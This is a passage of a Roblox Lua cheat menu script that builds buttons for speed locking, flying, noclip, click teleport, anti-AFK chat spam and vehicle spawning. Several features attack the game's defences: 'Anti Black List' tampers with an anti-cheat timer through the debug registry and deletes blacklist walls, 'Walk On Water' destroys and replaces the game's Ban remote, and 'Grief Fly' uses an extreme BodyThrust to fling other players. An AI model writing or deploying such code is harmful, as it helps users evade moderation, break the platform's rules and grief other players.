  3435. local Humanoid = game:GetService("Players").LocalPlayer.Character.Humanoid;
  3436. Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function()
  3437. Humanoid.WalkSpeed = _G.WS;
  3438. end)
  3439. Humanoid.WalkSpeed = _G.WS;
  3440.  
  3441. walkspeedenabled = false
  3442. end
  3443. end
  3444. end
  3445.  
  3446. walkspeedmouse.KeyDown:connect(x_walkspeed)
  3447.  
  3448. end)
  3449.  
  3450. AntiBlack.Name = "AntiBlackLabel"
  3451. AntiBlack.Parent = toolaFrame
  3452. AntiBlack.BackgroundColor3 = Color3.new(0, 0, 0)
  3453. AntiBlack.BorderColor3 = Color3.new(0, 0, 0)
  3454. AntiBlack.Position = UDim2.new(0, 3, 0, 49)
  3455. AntiBlack.Size = UDim2.new(0, 165, 0, 20)
  3456. AntiBlack.Font = Enum.Font.Fantasy
  3457. AntiBlack.FontSize = Enum.FontSize.Size18
  3458. AntiBlack.Text = "Anti Black List (OFF)"
  3459. AntiBlack.TextColor3 = Color3.new(255, 0, 0)
  3460. AntiBlack.TextSize = 15
  3461. AntiBlack.MouseButton1Click:connect(function()
  3462. makesound("rbxassetid://156785206")
  3463. AntiBlack.TextColor3 = Color3.new(0, 1, 0)
  3464. AntiBlack.BackgroundColor3 = Color3.new(0, 0, 0)
  3465. AntiBlack.Text = "Anti Black List (ON)"
  3466. local plr = game.Players.LocalPlayer
  3467. local cframe
  3468. for i,v in next, workspace:GetDescendants() do
  3469. if v:IsA("SpawnLocation") then
  3470. v.Touched:Connect(function(h)
  3471. if h.Parent == plr.Character and cframe then
  3472. plr.Character:SetPrimaryPartCFrame(cframe)
  3473. end
  3474. end)
  3475. end
  3476. end
  3477.  
  3478. game:GetService("RunService"):BindToRenderStep("NO HACKS",Enum.RenderPriority.Last.Value,function()
  3479. if game.Players.LocalPlayer.Character.PrimaryPart then
  3480. cframe = game.Players.LocalPlayer.Character.PrimaryPart.CFrame
  3481. end
  3482. end)
  3483.  
  3484. for i,v in next, debug.getregistry() do
  3485. if type(v)=='function' and debug.getupvalues(v).lastUpdate then
  3486. debug.setupvalue(v,"lastUpdate",math.huge)
  3487. break
  3488. end
  3489. end
  3490.  
  3491. for i,v in next, workspace.Effects:GetChildren() do
  3492. if v:IsA("BasePart") and v.Name == "BlacklistWall" then
  3493. v:Destroy()
  3494. end
  3495. end
  3496. end)
  3497.  
  3498. GriefFly.Name = "GriefFly"
  3499. GriefFly.Parent = toolaFrame
  3500. GriefFly.BackgroundColor3 = Color3.new(0, 0, 0)
  3501. GriefFly.BorderColor3 = Color3.new(0, 0, 0)
  3502. GriefFly.Position = UDim2.new(0, 3, 0, 72)
  3503. GriefFly.Size = UDim2.new(0, 110, 0, 20)
  3504. GriefFly.Font = Enum.Font.Fantasy
  3505. GriefFly.FontSize = Enum.FontSize.Size18
  3506. GriefFly.Text = "Grief Fly Off "
  3507. GriefFly.TextColor3 = Color3.new(255, 0, 0)
  3508. GriefFly.TextSize = 15
  3509. GriefFly.MouseButton1Click:connect(function()
  3510. GriefFly.Text = "Grief Fly On "
  3511. GriefFly.TextColor3 = Color3.new(0, 1, 0)
  3512. StopGriefFly.Text = "Stop Fly"
  3513. Speed = 2
  3514. Force = 800000
  3515.  
  3516. --Script:
  3517. lplayer = game:GetService("Players").LocalPlayer
  3518. Mouse = lplayer:GetMouse()
  3519. speedfly = Speed
  3520. T = lplayer.Character.HumanoidRootPart
  3521. CONTROL = {F = 0, B = 0, L = 0, R = 0}
  3522. lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  3523.  
  3524. local function fly()
  3525. flying = true
  3526. local BG = Instance.new('BodyGyro', T)
  3527. local BV = Instance.new('BodyVelocity', T)
  3528. BG.P = 9e4
  3529. BG.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  3530. BG.cframe = T.CFrame
  3531. BV.velocity = Vector3.new(0, 0.1, 0)
  3532. BV.maxForce = Vector3.new(9e9, 9e9, 9e9)
  3533. spawn(function()
  3534. repeat wait()
  3535. lplayer.Character.Humanoid.PlatformStand = true
  3536. if CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0 then
  3537. SPEED = 50
  3538. elseif not (CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0) and SPEED ~= 0 then
  3539. SPEED = 0
  3540. end
  3541. if (CONTROL.L + CONTROL.R) ~= 0 or (CONTROL.F + CONTROL.B) ~= 0 then
  3542. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (CONTROL.F + CONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(CONTROL.L + CONTROL.R, (CONTROL.F + CONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  3543. lCONTROL = {F = CONTROL.F, B = CONTROL.B, L = CONTROL.L, R = CONTROL.R}
  3544. elseif (CONTROL.L + CONTROL.R) == 0 and (CONTROL.F + CONTROL.B) == 0 and SPEED ~= 0 then
  3545. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (lCONTROL.F + lCONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(lCONTROL.L + lCONTROL.R, (lCONTROL.F + lCONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  3546. else
  3547. BV.velocity = Vector3.new(0, 0.1, 0)
  3548. end
  3549. BG.cframe = workspace.CurrentCamera.CoordinateFrame
  3550. until not flying
  3551. CONTROL = {F = 0, B = 0, L = 0, R = 0}
  3552. lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  3553. SPEED = 0
  3554. BG:destroy()
  3555. BV:destroy()
  3556. lplayer.Character.Humanoid.PlatformStand = false
  3557. end)
  3558. end
  3559. Mouse.KeyDown:connect(function(KEY)
  3560. if KEY:lower() == 'w' then
  3561. CONTROL.F = speedfly
  3562. elseif KEY:lower() == 's' then
  3563. CONTROL.B = -speedfly
  3564. elseif KEY:lower() == 'a' then
  3565. CONTROL.L = -speedfly
  3566. elseif KEY:lower() == 'd' then
  3567. CONTROL.R = speedfly
  3568. end
  3569. end)
  3570. Mouse.KeyUp:connect(function(KEY)
  3571. if KEY:lower() == 'w' then
  3572. CONTROL.F = 0
  3573. elseif KEY:lower() == 's' then
  3574. CONTROL.B = 0
  3575. elseif KEY:lower() == 'a' then
  3576. CONTROL.L = 0
  3577. elseif KEY:lower() == 'd' then
  3578. CONTROL.R = 0
  3579. end
  3580. end)
  3581. fly()
  3582.  
  3583.  
  3584. -- Made by JackMcJagger15
  3585.  
  3586. power = Force -- change this to make it more or less powerful
  3587.  
  3588. game:GetService('RunService').Stepped:connect(function()
  3589. game.Players.LocalPlayer.Character.Head.CanCollide = false
  3590. game.Players.LocalPlayer.Character.Torso.CanCollide = false
  3591. game.Players.LocalPlayer.Character["Left Leg"].CanCollide = false
  3592. game.Players.LocalPlayer.Character["Right Leg"].CanCollide = false
  3593. end)
  3594.  
  3595. wait(.1)
  3596. local bambam = Instance.new("BodyThrust")
  3597. bambam.Parent = game.Players.LocalPlayer.Character.HumanoidRootPart
  3598. bambam.Force = Vector3.new(power,0,power)
  3599. bambam.Location = game.Players.LocalPlayer.Character.HumanoidRootPart.Position
  3600.  
  3601. while wait(0.2) do
  3602. game.Players.LocalPlayer.Character:WaitForChild("Humanoid").Died:connect(function()
  3603. script:Remove()
  3604. end)
  3605. end
  3606. end)
  3607.  
  3608. StopGriefFly.Name = "StopGriefFly"
  3609. StopGriefFly.Parent = toolaFrame
  3610. StopGriefFly.BackgroundColor3 = Color3.new(0, 0, 0)
  3611. StopGriefFly.BorderColor3 = Color3.new(0, 0, 0)
  3612. StopGriefFly.Position = UDim2.new(0, 117, 0, 72)
  3613. StopGriefFly.Size = UDim2.new(0, 51, 0, 20)
  3614. StopGriefFly.Font = Enum.Font.Fantasy
  3615. StopGriefFly.FontSize = Enum.FontSize.Size18
  3616. StopGriefFly.Text = "Stop Fly"
  3617. StopGriefFly.TextColor3 = Color3.new(255, 0, 0)
  3618. StopGriefFly.TextSize = 15
  3619. StopGriefFly.MouseButton1Click:connect(function()
  3620. GriefFly.TextColor3 = Color3.new(1, 1, 1)
  3621. active = false
  3622. game.Players.LocalPlayer.Character.HumanoidRootPart.BodyThrust:Remove()
  3623. if flying then
  3624. end
  3625. GriefFly.Text = "Grief Fly Off "
  3626. StopGriefFly.Text = "Press Fly"
  3627. GriefFly.TextColor3 = Color3.new(255, 0, 0)
  3628. end)
  3629.  
  3630. Fly.Name = "Fly"
  3631. Fly.Parent = toolaFrame
  3632. Fly.BackgroundColor3 = Color3.new(0, 0, 0)
  3633. Fly.BorderColor3 = Color3.new(0, 0, 0)
  3634. Fly.Position = UDim2.new(0, 3, 0, 95)
  3635. Fly.Size = UDim2.new(0, 165, 0, 20)
  3636. Fly.Font = Enum.Font.Fantasy
  3637. Fly.FontSize = Enum.FontSize.Size18
  3638. Fly.Text = "Fly (Press again to STOP)"
  3639. Fly.TextColor3 = Color3.new(255, 0, 0)
  3640. Fly.TextSize = 15
  3641. Fly.MouseButton1Down:connect(function()
  3642. makesound("rbxassetid://156785206")
  3643.  
  3644. flying = not flying
  3645. repeat wait()
  3646. until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")
  3647. local mouse = game.Players.LocalPlayer:GetMouse()
  3648. repeat wait() until mouse
  3649. local plr = game.Players.LocalPlayer
  3650. local torso = plr.Character.Torso
  3651. local deb = true
  3652. local ctrl = {f = 0, b = 0, l = 0, r = 0}
  3653. local lastctrl = {f = 0, b = 0, l = 0, r = 0}
  3654. local maxspeed = 200
  3655. local speed = 0
  3656. if flying then
  3657. end
  3658.  
  3659. function FlyFunction()
  3660. local bg = Instance.new("BodyGyro", torso)
  3661. bg.P = 9e4
  3662. bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  3663. bg.cframe = torso.CFrame
  3664. local bv = Instance.new("BodyVelocity", torso)
  3665. bv.velocity = Vector3.new(0,0.1,0)
  3666. bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
  3667. repeat wait()
  3668. plr.Character.Humanoid.PlatformStand = true
  3669. if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
  3670. speed = speed+.5+(speed/maxspeed)
  3671. if speed > maxspeed then
  3672. speed = maxspeed
  3673. end
  3674. elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
  3675. speed = speed-1
  3676. if speed < 0 then
  3677. speed = 0
  3678. end
  3679. end
  3680. if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
  3681. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  3682. lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
  3683. elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
  3684. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  3685. else
  3686. bv.velocity = Vector3.new(0,0.1,0)
  3687. end
  3688. bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
  3689. until not flying
  3690. ctrl = {f = 0, b = 0, l = 0, r = 0}
  3691. lastctrl = {f = 0, b = 0, l = 0, r = 0}
  3692. speed = 0
  3693. bg:Destroy()
  3694. bv:Destroy()
  3695. plr.Character.Humanoid.PlatformStand = false
  3696. end
  3697. mouse.KeyDown:connect(function(key)
  3698. if key:lower() == "w" then
  3699. ctrl.f = 1
  3700. elseif key:lower() == "s" then
  3701. ctrl.b = -1
  3702. elseif key:lower() == "a" then
  3703. ctrl.l = -1
  3704. elseif key:lower() == "d" then
  3705. ctrl.r = 1
  3706.  
  3707. end
  3708. end)
  3709. mouse.KeyUp:connect(function(key)
  3710. if key:lower() == "w" then
  3711. ctrl.f = 0
  3712. elseif key:lower() == "s" then
  3713. ctrl.b = 0
  3714. elseif key:lower() == "a" then
  3715. ctrl.l = 0
  3716. elseif key:lower() == "d" then
  3717. ctrl.r = 0
  3718. end
  3719. end)
  3720. FlyFunction()
  3721.  
  3722. end)
  3723.  
  3724. PinkWires.Name = "PinkWires"
  3725. PinkWires.Parent = toolaFrame
  3726. PinkWires.BackgroundColor3 = Color3.new(0, 0, 0)
  3727. PinkWires.BorderColor3 = Color3.new(0, 0, 0)
  3728. PinkWires.Position = UDim2.new(0, 3, 0, 118)
  3729. PinkWires.Size = UDim2.new(0, 165, 0, 20)
  3730. PinkWires.Font = Enum.Font.Fantasy
  3731. PinkWires.FontSize = Enum.FontSize.Size18
  3732. PinkWires.Text = "Pink Wires"
  3733. PinkWires.TextColor3 = Color3.new(255, 0, 0)
  3734. PinkWires.TextSize = 15
  3735. PinkWires.MouseButton1Click:connect(function()
  3736. makesound("rbxassetid://156785206")
  3737. local typecurrent = false
  3738. if typecurrent == true then
  3739. typecurrent = false
  3740. PinkWires.TextColor3 = Color3.new(0.666667, 0, 0)
  3741. PinkWires.Text = "Pink Wires: Magenta Icicle"
  3742. local c = game.ReplicatedStorage.Purchasables:FindFirstChild("IcicleWireMagenta", true)
  3743. c.Name = "Wire"
  3744. local d = game.ReplicatedStorage.Purchasables:FindFirstChild("Wire", true)
  3745. d:Destroy()
  3746. elseif typecurrent == false then
  3747. typecurrent = true
  3748. PinkWires.TextColor3 = Color3.new(0, 1,0)
  3749. PinkWires.Text = "Pink Wires: Active"
  3750. local a = game.ReplicatedStorage.Purchasables:FindFirstChild("NeonWirePinky", true)
  3751. a.Name = "Wire"
  3752. local b = game.ReplicatedStorage.Purchasables:FindFirstChild("Wire", true)
  3753. b:Destroy()
  3754. end
  3755. end)
  3756.  
  3757. WaterCollide.Name = "WaterCollide"
  3758. WaterCollide.Parent = toolaFrame
  3759. WaterCollide.BackgroundColor3 = Color3.new(0, 0, 0)
  3760. WaterCollide.BorderColor3 = Color3.new(0, 0, 0)
  3761. WaterCollide.Position = UDim2.new(0, 3, 0, 141)
  3762. WaterCollide.Size = UDim2.new(0, 165, 0, 20)
  3763. WaterCollide.Font = Enum.Font.Fantasy
  3764. WaterCollide.FontSize = Enum.FontSize.Size18
  3765. WaterCollide.Text = "Walk On Water"
  3766. WaterCollide.TextColor3 = Color3.new(255, 0, 0)
  3767. WaterCollide.TextSize = 15
  3768. WaterCollide.MouseButton1Down:connect(function()
  3769. makesound("rbxassetid://156785206")
  3770. if WCollide == "Nothing" then
  3771. WCollide = "On"
  3772. WaterCollide.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  3773. WaterCollide.TextColor3 = Color3.new(0, 1, 0)
  3774. WaterCollide.Text = "Water Is Solid"
  3775. game:service'ReplicatedStorage'.Interaction.Ban:Destroy()
  3776. Instance.new('RemoteEvent', game:service'ReplicatedStorage'.Interaction).Name = "Ban"
  3777. for i,v in pairs(game.Workspace.Water:GetChildren()) do
  3778. if v:IsA("Part") then
  3779. v.CanCollide = true
  3780. end
  3781. end
  3782. else
  3783. WCollide = "Nothing"
  3784. WaterCollide.BackgroundColor3 = Color3.new(0, 0, 0)
  3785. WaterCollide.TextColor3 = Color3.new(255, 0, 0)
  3786. WaterCollide.Text = "Walk On Water"
  3787. for i,v in pairs(game.Workspace.Water:GetChildren()) do
  3788. if v:IsA("Part") then
  3789. v.CanCollide = false
  3790. end
  3791. end
  3792. end
  3793. end)
  3794.  
  3795.  
  3796. ClickTP.Name = "ClickTP"
  3797. ClickTP.Parent = toolaFrame
  3798. ClickTP.BackgroundColor3 = Color3.new(0, 0, 0)
  3799. ClickTP.BorderColor3 = Color3.new(0, 0, 0)
  3800. ClickTP.Position = UDim2.new(0, 3, 0, 164)
  3801. ClickTP.Size = UDim2.new(0, 165, 0, 20)
  3802. ClickTP.Font = Enum.Font.Fantasy
  3803. ClickTP.FontSize = Enum.FontSize.Size18
  3804. ClickTP.Text = "ClickTP"
  3805. ClickTP.TextColor3 = Color3.new(255, 0, 0)
  3806. ClickTP.TextSize = 15
  3807. ClickTP.MouseButton1Click:Connect(function()
  3808. makesound("rbxassetid://156785206")
  3809. mouse = game.Players.LocalPlayer:GetMouse()
  3810. tool = Instance.new("Tool")
  3811. tool.RequiresHandle = false
  3812. tool.Name = "Click Teleport"
  3813. tool.Activated:connect(function()
  3814. local pos = mouse.Hit+Vector3.new(0,2.5,0)
  3815. pos = CFrame.new(pos.X,pos.Y,pos.Z)
  3816. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
  3817. end)
  3818. tool.Parent = game.Players.LocalPlayer.Backpack
  3819. end)
  3820.  
  3821. Noclip.Name = "Noclip"
  3822. Noclip.Parent = toolaFrame
  3823. Noclip.BackgroundColor3 = Color3.new(0, 0, 0)
  3824. Noclip.BorderColor3 = Color3.new(0, 0, 0)
  3825. Noclip.Position = UDim2.new(0, 3, 0, 187)
  3826. Noclip.Size = UDim2.new(0, 165, 0, 20)
  3827. Noclip.Font = Enum.Font.Fantasy
  3828. Noclip.FontSize = Enum.FontSize.Size18
  3829. Noclip.Text = "No clip"
  3830. Noclip.TextColor3 = Color3.new(255, 0, 0)
  3831. Noclip.TextSize = 15
  3832. noclip = false
  3833. game:GetService('RunService').Stepped:connect(function()
  3834. if noclip then
  3835. game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
  3836. Noclip.BackgroundColor3 = Color3.new(0, 0, 0)
  3837. Noclip.TextColor3 = Color3.new(0, 1, 0)
  3838. Noclip.Text = "No Clip On"
  3839. end
  3840. end)
  3841. Noclip.MouseButton1Down:connect(function()
  3842. makesound("rbxassetid://156785206")
  3843. noclip = not noclip
  3844. Noclip.BackgroundColor3 = Color3.new(0, 0, 0)
  3845. Noclip.TextColor3 = Color3.new(255, 0, 0)
  3846. Noclip.Text = "No Clip Off"
  3847.  
  3848. end)
  3849. AntiAFKtime.Name = "AntiAFKtime"
  3850. AntiAFKtime.Parent = toolaFrame
  3851. AntiAFKtime.BackgroundColor3 = Color3.new(0, 0, 0)
  3852. AntiAFKtime.BorderColor3 = Color3.new(0, 0, 0)
  3853. AntiAFKtime.Position = UDim2.new(0, 3, 0, 210)
  3854. AntiAFKtime.Size = UDim2.new(0, 165, 0, 20)
  3855. AntiAFKtime.Font = Enum.Font.Fantasy
  3856. AntiAFKtime.FontSize = Enum.FontSize.Size18
  3857. AntiAFKtime.Text = "AFK for: 0 Seconds"
  3858. AntiAFKtime.TextColor3 = Color3.new(255, 0, 0)
  3859. AntiAFKtime.TextSize = 15
  3860.  
  3861.  
  3862. AntiAFK.Name = "AntiAFK"
  3863. AntiAFK.Parent = toolaFrame
  3864. AntiAFK.BackgroundColor3 = Color3.new(0, 0, 0)
  3865. AntiAFK.BorderColor3 = Color3.new(0, 0, 0)
  3866. AntiAFK.Position = UDim2.new(0, 3, 0, 233)
  3867. AntiAFK.Size = UDim2.new(0, 165, 0, 20)
  3868. AntiAFK.Font = Enum.Font.Fantasy
  3869. AntiAFK.FontSize = Enum.FontSize.Size18
  3870. AntiAFK.Text = "Start Anti-AFK Mode"
  3871. AntiAFK.TextColor3 = Color3.new(255, 0, 0)
  3872. AntiAFK.TextSize = 15
  3873. AntiAFK.MouseButton1Down:Connect(function()
  3874. makesound("rbxassetid://156785206")
  3875. if afkactive == true then
  3876. afkactive = false
  3877. AntiAFK.BackgroundColor3 = Color3.new(0, 0, 0)
  3878. AntiAFKtime.TextColor3 = Color3.new(0, 1, 0)
  3879. AntiAFK.Text = "Start Anti-AFK Mode"
  3880. elseif afkactive == false then
  3881. afkactive = true
  3882. AntiAFK.BackgroundColor3 = Color3.new(0, 0, 0)
  3883. AntiAFKtime.TextColor3 = Color3.new(1, 1, 1)
  3884. AntiAFK.Text = "Stop Anti-AFK Mode"
  3885.  
  3886. logtime = coroutine.wrap(function()
  3887. afktotaltime=0
  3888. while afkactive == true do
  3889. wait(1)
  3890. afktotaltime=afktotaltime+1
  3891. AntiAFKtime.Text = "AFK for: "..afktotaltime.." Seconds"
  3892. end
  3893. end)
  3894.  
  3895. messageBot = coroutine.wrap(function()
  3896. while afkactive == true do
  3897. wait(900)
  3898. possiblechats = {"afk", "brb", "I'm AFK"}
  3899. decide=math.random(1,#possiblechats)
  3900. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(possiblechats[decide], "All")
  3901. game.Players:Chat("/e point")
  3902. end
  3903. end)
  3904.  
  3905. moveChar = coroutine.wrap(function()
  3906. plr = game:service'Players'.LocalPlayer
  3907. char = plr.Character
  3908. hum = char:FindFirstChildOfClass'Humanoid'
  3909. while afkactive==true do
  3910. wait(1)
  3911. hum:Move(Vector3.new(1, 0, 0), false)
  3912. wait(1)
  3913. hum:Move(Vector3.new(-1, 0, 0), false)
  3914. wait(1)
  3915. hum:Move(Vector3.new(1, 0, 0), false)
  3916. wait(1)
  3917. hum:Move(Vector3.new(-1, 0, 0), false)
  3918. wait(1)
  3919. hum:Move(Vector3.new(0, 1, 0), false)
  3920. wait(1)
  3921. hum:Move(Vector3.new(0, 1, 0), false)
  3922. wait(60)
  3923. end
  3924. end)
  3925.  
  3926. logtime()
  3927. moveChar()
  3928. messageBot()
  3929.  
  3930. end
  3931. end)
  3932.  
  3933.  
  3934. Fog.Name = "Fog"
  3935. Fog.Parent = toolaFrame
  3936. Fog.BackgroundColor3 = Color3.new(0, 0, 0)
  3937. Fog.BorderColor3 = Color3.new(0, 0, 0)
  3938. Fog.Position = UDim2.new(0, 3, 0, 256)
  3939. Fog.Size = UDim2.new(0, 165, 0, 20)
  3940. Fog.Font = Enum.Font.Fantasy
  3941. Fog.FontSize = Enum.FontSize.Size18
  3942. Fog.Text = "Remove Fog"
  3943. Fog.TextColor3 = Color3.new(255, 0, 0)
  3944. Fog.TextSize = 15
  3945. Fog.MouseButton1Down:connect(function()
  3946. makesound("rbxassetid://156785206")
  3947. Fog.BackgroundColor3 = Color3.new(0, 0, 0)
  3948. Fog.TextColor3 = Color3.new(0, 1, 0)
  3949. game.Lighting.Changed:connect(function()
  3950. game.Lighting.TimeOfDay = "12:00:00"
  3951. game.Lighting.FogEnd = 9999
  3952. game.Lighting.Brightness = 2
  3953. end)
  3954. end)
  3955.  
  3956. CARAs.Name = "CARAs"
  3957. CARAs.Parent = toolaFrame
  3958. CARAs.BackgroundColor3 = Color3.new(0, 0, 0)
  3959. CARAs.BorderColor3 = Color3.new(0, 0, 0)
  3960. CARAs.Position = UDim2.new(0, 147, 0, 279)
  3961. CARAs.Size = UDim2.new(0, 21, 0, 20)
  3962. CARAs.Font = Enum.Font.Fantasy
  3963. CARAs.FontSize = Enum.FontSize.Size18
  3964. CARAs.Text = "S"
  3965. CARAs.TextColor3 = Color3.new(255, 0, 0)
  3966. CARAs.TextSize = 15
  3967.  
  3968. CARA.Name = "CARA"
  3969. CARA.Parent = toolaFrame
  3970. CARA.BackgroundColor3 = Color3.new(0, 0, 0)
  3971. CARA.BorderColor3 = Color3.new(0, 0, 0)
  3972. CARA.Position = UDim2.new(0, 3, 0, 279)
  3973. CARA.Size = UDim2.new(0, 140, 0, 20)
  3974. CARA.Font = Enum.Font.Fantasy
  3975. CARA.FontSize = Enum.FontSize.Size18
  3976. CARA.Text = "Fast Car"
  3977. CARA.TextColor3 = Color3.new(255, 0, 0)
  3978. CARA.TextSize = 15
  3979. CARA.MouseButton1Down:connect(function()
  3980. makesound("rbxassetid://156785206")
  3981. CARA.BackgroundColor3 = Color3.new(0, 0, 0)
  3982. CARA.TextColor3 = Color3.new(0, 1, 0)
  3983. game.Workspace.PlayerModels.ChildAdded:connect(function(ADDED)
  3984. wait(0.5)
  3985. if ADDED:FindFirstChild('Configuration') then
  3986. if ADDED.Configuration:FindFirstChild('MaxSpeed') then
  3987. ADDED.Configuration.MaxSpeed.Value = CARAs.Text
  3988. end
  3989. end
  3990. end)
  3991. end)
  3992.  
  3993. PinkCar = Instance.new("TextButton")
  3994. TpCar = Instance.new("TextButton")
  3995. PinkCars = Instance.new("TextButton")
  3996.  
  3997. PinkCar.Name = "PinkCar"
  3998. PinkCar.Parent = toolaFrame
  3999. PinkCar.BackgroundColor3 = Color3.new(0, 0, 0)
  4000. PinkCar.BorderColor3 = Color3.new(0, 0, 0)
  4001. PinkCar.Position = UDim2.new(0, 3, 0, 302)
  4002. PinkCar.Size = UDim2.new(0, 140, 0, 20)
  4003. PinkCar.Font = Enum.Font.Fantasy
  4004. PinkCar.FontSize = Enum.FontSize.Size18
  4005. PinkCar.Text = "Pink Car Spawner"
  4006. PinkCar.TextColor3 = Color3.new(255, 0, 0)
  4007. PinkCar.TextSize = 15
  4008.  
  4009. PinkCars.Name = "PinkCars"
  4010. PinkCars.Parent = toolaFrame
  4011. PinkCars.BackgroundColor3 = Color3.new(0, 0, 0)
  4012. PinkCars.BorderColor3 = Color3.new(0, 0, 0)
  4013. PinkCars.Position = UDim2.new(0, 147, 0, 302)
  4014. PinkCars.Size = UDim2.new(0, 21, 0, 20)
  4015. PinkCars.Font = Enum.Font.Fantasy
  4016. PinkCars.FontSize = Enum.FontSize.Size18
  4017. PinkCars.Text = "C"
  4018. PinkCars.TextColor3 = Color3.new(255, 0, 0)
  4019. PinkCars.TextSize = 15
  4020.  
  4021. PinkCar.MouseButton1Click:connect(function()
  4022. PinkCars.TextColor3 = Color3.new(0, 1, 0)
  4023. PinkCar.TextColor3 = Color3.new(0, 1, 0)
  4024. if _G.Executed == false or _G.Executed == nil then
  4025. _G.Executed = true
  4026. Spawned = false
  4027. Spawning = false
  4028. SpawnPad = nil
  4029. workspace.PlayerModels.ChildAdded:connect(function(Added)
  4030. if Spawned == false and Spawning == false then
  4031. Owner = nil
  4032. CheckTries = 0
  4033. CheckSuccess = false
  4034. repeat
  4035. wait()
  4036. CheckTries = CheckTries + 1
  4037. if Added:FindFirstChild("Owner") and Added:FindFirstChild("Type") and Added.Type.Value == "Vehicle" and Added:FindFirstChild("Settings") and Added.Settings:FindFirstChild("Color") then
  4038. CheckSuccess = true
  4039. Owner = Added.Owner.Value
  4040. end
  4041. until CheckTries == 75 or CheckSuccess == true
  4042. if Owner == game.Players.LocalPlayer or game.ReplicatedStorage.Interaction.ClientIsWhitelisted:InvokeServer(Owner) == true then
  4043. Spawning = true
  4044. Added:WaitForChild("Settings")
  4045. Added.Settings:WaitForChild("Color")
  4046. if tostring(Added.Settings.Color.Value) == tostring(1032) then
  4047. Spawned = true
  4048. Spawning = false
  4049. print(Spawned)
  4050. elseif tostring(Added.Settings.Color.Value) ~= tostring(1032) then
  4051. if SpawnPad:FindFirstChild("ButtonRemote_SpawnButton") and SpawnPad:FindFirstChild("Owner") then
  4052. if SpawnPad.Owner.Value == game.Players.LocalPlayer or game.ReplicatedStorage.Interaction.ClientIsWhitelisted:InvokeServer(SpawnPad.Owner.Value) == true then
  4053. Spawning = false
  4054. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(SpawnPad.ButtonRemote_SpawnButton)
  4055. end
  4056. end
  4057. end
  4058. end
  4059. end
  4060. end)
  4061.  
  4062. mouse = game.Players.LocalPlayer:GetMouse()
  4063. mouse.KeyDown:connect(function(key)
  4064. if key:lower() == "c" then
  4065. if mouse.Target.Parent:FindFirstChild("ButtonRemote_SpawnButton") then
  4066. SpawnPad = mouse.Target.Parent
  4067. Spawned = false
  4068. Spawning = false
  4069. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(mouse.Target.Parent.ButtonRemote_SpawnButton)
  4070. else
  4071. Spawned = true
  4072. Spawning = false
  4073. end
  4074. end
  4075. end)
  4076. end
  4077. spawn(function()
  4078. repeat
  4079. wait()
  4080. if Spawned == true then
  4081. Spawned = false
  4082. game:GetService("StarterGui"):SetCore("SendNotification", {
  4083. Title = "Pink Car",
  4084. Text = "Successful Spawned."
  4085. })
  4086. end
  4087. until Spawned == true
  4088. end)
  4089. end)
  4090.  
  4091. TpCar.Name = "TpCar"
  4092. TpCar.Parent = toolaFrame
  4093. TpCar.BackgroundColor3 = Color3.new(0, 0, 0)
  4094. TpCar.BorderColor3 = Color3.new(0, 0, 0)
  4095. TpCar.Position = UDim2.new(0, 3, 0, 325)
  4096. TpCar.Size = UDim2.new(0, 165, 0, 20)
  4097. TpCar.Font = Enum.Font.Fantasy
  4098. TpCar.FontSize = Enum.FontSize.Size18
  4099. TpCar.Text = "TP Cars"
  4100. TpCar.TextColor3 = Color3.new(255, 0, 0)
  4101. TpCar.TextSize = 15
  4102.  
  4103. TpCarFrame.Name = "TpCarFrame"
  4104. TpCarFrame.Parent = MenuFrame
  4105. TpCarFrame.BorderSizePixel = 1
  4106. TpCarFrame.BackgroundTransparency = 0
  4107. TpCarFrame.BorderColor3 = Color3.new(0, 0, 0)
  4108. TpCarFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  4109. TpCarFrame.Size = UDim2.new(0, 170, 0, 327)
  4110. TpCarFrame.Visible = false
  4111.  
  4112. SpawnPointa.Name = "SpawnPointa"
  4113. SpawnPointa.Parent = TpCarFrame
